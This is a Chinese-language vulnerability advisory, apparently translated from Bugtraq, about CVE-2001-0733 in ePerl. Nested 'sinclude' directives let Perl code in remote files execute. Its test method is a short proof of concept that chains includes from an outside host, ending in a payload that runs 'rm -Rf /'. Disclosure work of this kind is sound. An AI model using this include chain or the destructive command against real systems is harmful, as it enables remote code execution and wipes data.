首页 -> 安全研究

安全研究

安全漏洞
ePerl 外部代码执行漏洞

发布日期:2001-06-19
更新日期:2001-07-03

受影响系统:

Ralf S. Engelschall ePerl < 2.2.14
Ralf S. Engelschall ePerl 2.1.2
Ralf S. Engelschall ePerl 2.1.1
Ralf S. Engelschall ePerl 2.1
Ralf S. Engelschall ePerl 2.0.3
Ralf S. Engelschall ePerl 2.0.2
Ralf S. Engelschall ePerl 2.0.1
Ralf S. Engelschall ePerl 2.0
描述:

BUGTRAQ  ID: 2912
CVE(CAN) ID: CVE-2001-0733

ePerl是一个Unix系统下的Perl过滤和解释程序。

ePerl允许使用"sinclude"指令"安全"地包含外部文件,此外部文件中的perl代码将会被
忽略,然而这种安全限制很容易被绕过。
如果外部文件中再次使用"sinclude"指令包含了另一个外部文件,那么另一个外部文件中
的perl代码将被解释执行。

<*来源:David Madison (madison@transmeta.com) *>


测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!


David Madison (madison@transmeta.com)提供了如下测试方法:

1. 在目标主机上创建如下文件my_machine.html:
它包含下列指令:
-------------------------
#sinclude http://lala.com/untrusted.html
-------------------------
现在untrusted.html中即使包含perl代码,也不会被执行。

2. 在lala.com上创建untrusted.html文件:
它包含下列指令:
-------------------------
#include http://lala.com/untrusted2.html
-------------------------
3. 在lala.com上创建untrusted2.html文件:
这个文件中就可以防止perl代码,它将会被eperl解释执行:
-------------------------
<: system("rm -Rf /"); :>
-------------------------



建议:

厂商补丁:

目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商
的主页以获取最新版本:
http://www.engelschall.com/sw/eperl



浏览次数:3778
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障